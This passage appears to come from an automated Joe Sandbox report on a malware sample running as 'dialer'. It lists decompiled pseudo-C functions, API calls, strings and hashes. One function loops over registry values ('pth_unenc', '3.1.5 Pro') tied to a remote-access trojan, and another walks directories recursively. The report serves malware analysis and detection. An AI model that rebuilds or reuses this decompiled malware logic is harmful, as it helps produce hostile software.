						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8);
						continue;
					}
					E0040B107();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
					_push(L"pth_unenc");
					E0041053C(0x80000001, L00401ECB(E00416C32( &_v32, 0x46c518)));
					L00401ED0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402064(0x46c500, _t66, "3.1.5 Pro");
					_push("v");
					E00410497(0x46c518, L00401F75(0x46c518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}

APIs

Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
Part of subcall function 00410275: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000000), ref: 004102B3
Part of subcall function 00410275: RegCloseKey.KERNELBASE(?), ref: 004102BE

Sleep.KERNEL32(00000BB8), ref: 0040D509
ExitProcess.KERNEL32 ref: 0040D57E

Strings

override, xrefs: 0040D474
pth_unenc, xrefs: 0040D4AE, 0040D521
3.1.5 Pro, xrefs: 0040D4E4, 0040D557

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.1.5 Pro$override$pth_unenc
API String ID: 2281282204-3883831071
Opcode ID: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
Opcode Fuzzy Hash: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F

Uniqueness

Uniqueness Score: -1.00%

Function 0044926C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043604F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343

Strings

OCP, xrefs: 004492C0
ACP, xrefs: 0044928A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398

Uniqueness

Uniqueness Score: -1.00%

Function 00407C57, Relevance: 7.7, APIs: 5, Instructions: 246
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00407C57(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t146;
				signed int _t147;
				intOrPtr _t150;
				char* _t171;
				char* _t172;
				char* _t211;
				void* _t215;
				void* _t219;
				void* _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t226 = __eflags;
				_t150 = __ecx;
				E00450918(0x451e9c, _t219);
				_t222 = _t221 - 0x308;
				_push(_t146);
				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
				E004020B5(_t146, _t219 - 0x5c);
				_t81 = E004022EA(_t219 + 0x20, _t219 - 0x1c);
				_t83 = E004022AD(_t219 + 0x20, _t219 - 0x20);
				E00408228(_t219 - 0x28,  *((intOrPtr*)(E004022EA(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
				_t223 = _t222 + 0xc;
				_t204 = _t219 + 8;
				_t215 = FindFirstFileW(L00401ECB(E00407516(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
				 *(_t219 - 0x1c) = _t215;
				L00401ED0();
				if(_t215 != 0xffffffff) {
					_t147 = 0;
					__eflags = 0;
					while(1) {
						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
						__eflags = _t93;
						if(_t93 == 0) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t219 - 0x18));
						__eflags =  *_t211;
						if( *_t211 == 0) {
							__eflags =  *(_t219 - 0x30c) & 0x00000010;
							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
								L25:
								E0040425F(_t147, _t219 - 0x40, _t219 - 0x2e0);
								_t102 = E004022EA(_t219 - 0x40, _t219 - 0x28);
								_t217 = E004022AD(_t219 - 0x40, _t219 - 0x24);
								E00408228(_t219 - 0x44,  *((intOrPtr*)(E004022EA(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
								_t223 = _t223 + 0xc;
								__eflags = E00408099(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
								if(__eflags == 0) {
									L29:
									L00401ED0();
									_t215 =  *(_t219 - 0x1c);
									continue;
								}
								L00401FB1(_t219 - 0x5c, _t204, _t217, E0040208B(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
								L00401FA7();
								 *(_t219 - 4) = _t147;
								_t223 = _t223 - 0x18;
								_t204 = L00402F73(_t147, _t219 - 0x74, E00416CF4(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x46c238);
								L00402F73(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
								_push(0x66);
								__eflags = E00404A6E(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
								L00401FA7();
								L00401FA7();
								if((_t147 & 0xffffff00 | E00404A6E(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
									_t147 = 0;
									__eflags = 0;
									goto L29;
								}
								L00401ED0();
								L00401FA7();
								L00401ED0();
								L00401ED0();
								_t98 = 0;
								L31:
								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
								return _t98;
							}
							_t171 = ".";
							_t126 = _t219 - 0x2e0;
							while(1) {
								_t204 =  *_t126;
								__eflags = _t204 -  *_t171;
								if(_t204 !=  *_t171) {
									break;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									L13:
									_t127 = _t147;
									L15:
									__eflags = _t127;
									if(_t127 == 0) {
										goto L25;
									}
									_t172 = L"..";
									_t128 = _t219 - 0x2e0;
									while(1) {
										_t204 =  *_t128;
										__eflags = _t204 -  *_t172;
										if(_t204 !=  *_t172) {
											break;
										}
										__eflags = _t204;
										if(_t204 == 0) {
											L21:
											_t129 = _t147;
											L23:
											__eflags = _t129;
											if(__eflags != 0) {
												_push(_t172);
												_t204 = E00408252(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E0040425F(_t147, _t219 - 0x74, _t219 - 0x2e0));
												E00408276(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
												L00401ED0();
												L00401ED0();
												_t225 = _t223 - 0x18;
												E00407352(_t147, _t225, _t132, __eflags, _t219 + 0x20);
												_t223 = _t225 - 0x18;
												E00407352(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
												E00407C57(_t211, _t204, __eflags);
												L00401ED0();
											}
											goto L25;
										}
										_t204 =  *((intOrPtr*)(_t128 + 2));
										_t29 =  &(_t172[2]); // 0x2e
										__eflags = _t204 -  *_t29;
										if(_t204 !=  *_t29) {
											break;
										}
										_t128 = _t128 + 4;
										_t172 =  &(_t172[4]);
										__eflags = _t204;
										if(_t204 != 0) {
											continue;
										}
										goto L21;
									}
									asm("sbb eax, eax");
									_t129 = _t128 | 0x00000001;
									__eflags = _t129;
									goto L23;
								}
								_t204 =  *((intOrPtr*)(_t126 + 2));
								_t26 =  &(_t171[2]); // 0x2e0000
								__eflags = _t204 -  *_t26;
								if(_t204 !=  *_t26) {
									break;
								}
								_t126 = _t126 + 4;
								_t171 =  &(_t171[4]);
								__eflags = _t204;
								if(_t204 != 0) {
									continue;
								}
								goto L13;
							}
							asm("sbb eax, eax");
							_t127 = _t126 | 0x00000001;
							__eflags = _t127;
							goto L15;
						}
						FindClose(_t215);
						L6:
						L00401FA7();
						L00401ED0();
						L00401ED0();
						_t98 = _t147;
						goto L31;
					}
					FindClose(_t215);
					L00401FA7();
					L00401ED0();
					L00401ED0();
					_t98 = 1;
					goto L31;
				}
				_t147 = 1;
				goto L6;
			}

0x00407c57
0x00407c57
0x00407c5c
0x00407c61
0x00407c67
0x00407c6a
0x00407c6d
0x00407c73
0x00407c7f
0x00407c8d
0x00407ca9
0x00407cae
0x00407cbd
0x00407cda
0x00407cdc
0x00407ce5
0x00407ced
0x00407cf3
0x00407cf3
0x00407cf5
0x00407cfd
0x00407d03
0x00407d05
0x00000000
0x00000000
0x00407d0b
0x00407d0e
0x00407d11
0x00407d39
0x00407d40
0x00407e30
0x00407e3a
0x00407e46
0x00407e59
0x00407e70
0x00407e75
0x00407e85
0x00407e88
0x00407f41
0x00407f44
0x00407f49
0x00000000
0x00407f49
0x00407ea6
0x00407eae
0x00407eb3
0x00407eb6
0x00407edd
0x00407ee1
0x00407ee7
0x00407ef4
0x00407efd
0x00407f08
0x00407f0f
0x00407f3b
0x00407f3f
0x00407f3f
0x00000000
0x00407f3f
0x00407f14
0x00407f1c
0x00407f24
0x00407f2c
0x00407f31
0x00407f72
0x00407f75
0x00407f82
0x00407f82
0x00407d46
0x00407d4b
0x00407d51
0x00407d51
0x00407d54
0x00407d57
0x00000000
0x00000000
0x00407d59
0x00407d5c
0x00407d73
0x00407d73
0x00407d7c
0x00407d7c
0x00407d7e
0x00000000
0x00000000
0x00407d84
0x00407d89
0x00407d8f
0x00407d8f
0x00407d92
0x00407d95
0x00000000
0x00000000
0x00407d97
0x00407d9a
0x00407db1
0x00407db1
0x00407dba
0x00407dba
0x00407dbc
0x00407dbe
0x00407dde
0x00407de6
0x00407df2
0x00407dfa
0x00407dff
0x00407e08
0x00407e0d
0x00407e19
0x00407e20
0x00407e2b
0x00407e2b
0x00000000
0x00407dbc
0x00407d9c
0x00407da0
0x00407da0
0x00407da4
0x00000000
0x00000000
0x00407da6
0x00407da9
0x00407dac
0x00407daf
0x00000000
0x00000000
0x00000000
0x00407daf
0x00407db5
0x00407db7
0x00407db7
0x00000000
0x00407db7
0x00407d5e
0x00407d62
0x00407d62
0x00407d66
0x00000000
0x00000000
0x00407d68
0x00407d6b
0x00407d6e
0x00407d71
0x00000000
0x00000000
0x00000000
0x00407d71
0x00407d77
0x00407d79
0x00407d79
0x00000000
0x00407d79
0x00407d14
0x00407d1a
0x00407d1d
0x00407d25
0x00407d2d
0x00407d32
0x00000000
0x00407d32
0x00407f52
0x00407f5b
0x00407f63
0x00407f6b
0x00407f70
0x00000000
0x00407f70
0x00407cef
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00407C5C

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407CD4
FindNextFileW.KERNEL32(00000000,?), ref: 00407CFD
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D14

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: d3b7405251e5bcfe06c5cd5b5554dc60d4dc2bdcd9b8be609b8b9f1f6d48e1e9
Instruction ID: db450132b8784cc29f7dffc45e82a3a61089614d836ecdb15633904fdbdb58fb
Opcode Fuzzy Hash: d3b7405251e5bcfe06c5cd5b5554dc60d4dc2bdcd9b8be609b8b9f1f6d48e1e9
Instruction Fuzzy Hash: 88916F719001099BCB15FBA1CC519EE7379AF24348F14427FE806B71E1EB39AB49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00449440, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00449440(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46a00c; // 0x3dad585e
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00440972(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00440972(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x459f94; // 0x17
					E004493E3(0, 0x459e80, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					L00448D80(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						L00448E66(_t92, _t99,  &_v20);
					} else {
						L00448DCB(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x459e7c; // 0x41
						_t77 = E004493E3(_t99, 0x459b70, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044926C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E0042F61B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x43d072
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x43cfd2
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x43d052
								E0043A76D(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							L00448E66(_t92, _t99,  &_v20);
						} else {
							L00448DCB(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044954C
IsValidCodePage.KERNEL32(00000000), ref: 004495A7
IsValidLocale.KERNEL32(?,00000001), ref: 004495B6
GetLocaleInfoW.KERNEL32(?,00001001,0043CF52,00000040,?,0043D072,00000055,00000000,?,?,00000055,00000000), ref: 004495FE
GetLocaleInfoW.KERNEL32(?,00001002,0043CFD2,00000040), ref: 0044961D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
Instruction ID: 8a1905ba9bd6499ab3f410366c50d1caeed45d39038b25d0bae0cc1b30d53ac2
Opcode Fuzzy Hash: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
Instruction Fuzzy Hash: 67517172A00209ABFF11DFA5DC41ABF73B8AF04701F14046AE915E7291E778DE01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00448B08, Relevance: 6.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00448B08(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00440972(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E00448A99(0x459e80, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0044840A(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0044852D();
					} else {
						E00448493(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E00448A99(0x459b70, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0044852D();
							} else {
								E00448493(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E00448967(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x43d079
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = L00446EF9(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0043629A();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x46a00c; // 0x3dad585e
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00440972(_t89, _t100, _t116);
								_t122 =  *(E00440972(_t90, _t100, _t116) + 0x34c);
								_t129 = E0044921B(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E0044C0C1(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E0044934F(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E0042F61B(_v32 ^ _t132);
							} else {
								_t68 = E00441069(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x43cfd9
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x43d079
									if(E00441069(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00450867(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x43d079
											if(E00441069(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00450867(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x43d059
												E0043A76D(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x00448b08
0x00448b0d
0x00448b0e
0x00448b0f
0x00448b10
0x00448b11
0x00448b12
0x00448b17
0x00448b1a
0x00448b1c
0x00448b1f
0x00448b1f
0x00448b22
0x00448b22
0x00448b28
0x00448b2b
0x00448b2e
0x00448b2e
0x00448b31
0x00448b34
0x00448b3a
0x00448b3c
0x00448b41
0x00448b4b
0x00448b50
0x00448b53
0x00448b53
0x00448b57
0x00448b5b
0x00448ba4
0x00000000
0x00448b5d
0x00448b62
0x00448b6b
0x00448b64
0x00448b64
0x00448b64
0x00448b72
0x00448b76
0x00448b80
0x00448b85
0x00448b8a
0x00448b90
0x00448b94
0x00448b9d
0x00448b96
0x00448b96
0x00448b96
0x00448ba9
0x00448ba9
0x00448ba9
0x00448b8a
0x00448b76
0x00448baf
0x00448cc1
0x00448cc1
0x00448cc1
0x00000000
0x00448bb5
0x00448bc2
0x00448bc8
0x00000000
0x00448bf8
0x00448bf8
0x00448bfd
0x00448bff
0x00448bff
0x00448c01
0x00448c06
0x00448cbc
0x00448cbe
0x00000000
0x00448c0c
0x00448c0c
0x00448c0f
0x00448c0f
0x00448c17
0x00448c1a
0x00448c1d
0x00448c1d
0x00448c20
0x00448c23
0x00448c2b
0x00448c30
0x00448c37
0x00448c3c
0x00448c3f
0x00448c41
0x00448ccc
0x00448ccd
0x00448cce
0x00448ccf
0x00448cd0
0x00448cd1
0x00448cd6
0x00448cda
0x00448ce2
0x00448ce9
0x00448cec
0x00448ced
0x00448cf1
0x00448cf7
0x00448cff
0x00448d0e
0x00448d1a
0x00448d2b
0x00448d31
0x00448d33
0x00448d44
0x00448d4b
0x00448d4d
0x00448d50
0x00448d56
0x00448d58
0x00448d5a
0x00448d5a
0x00448d5d
0x00448d60
0x00448d60
0x00448d58
0x00448d6a
0x00448d35
0x00448d35
0x00448d37
0x00448d72
0x00448d7d
0x00448c47
0x00448c50
0x00448c55
0x00448c57
0x00000000
0x00448c59
0x00448c5b
0x00448c5b
0x00448c67
0x00448c75
0x00000000
0x00448c77
0x00448c77
0x00448c7a
0x00448c80
0x00448c83
0x00448c93
0x00448c98
0x00448ca6
0x00000000
0x00000000
0x00000000
0x00000000
0x00448c85
0x00448c85
0x00448c88
0x00448c8e
0x00448c8f
0x00448c91
0x00448ca8
0x00448cac
0x00448cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x00448c91
0x00448c83
0x00448c75
0x00448cc3
0x00448cc9
0x00448cc9
0x00448c41
0x00448c06
0x00448bc8

APIs

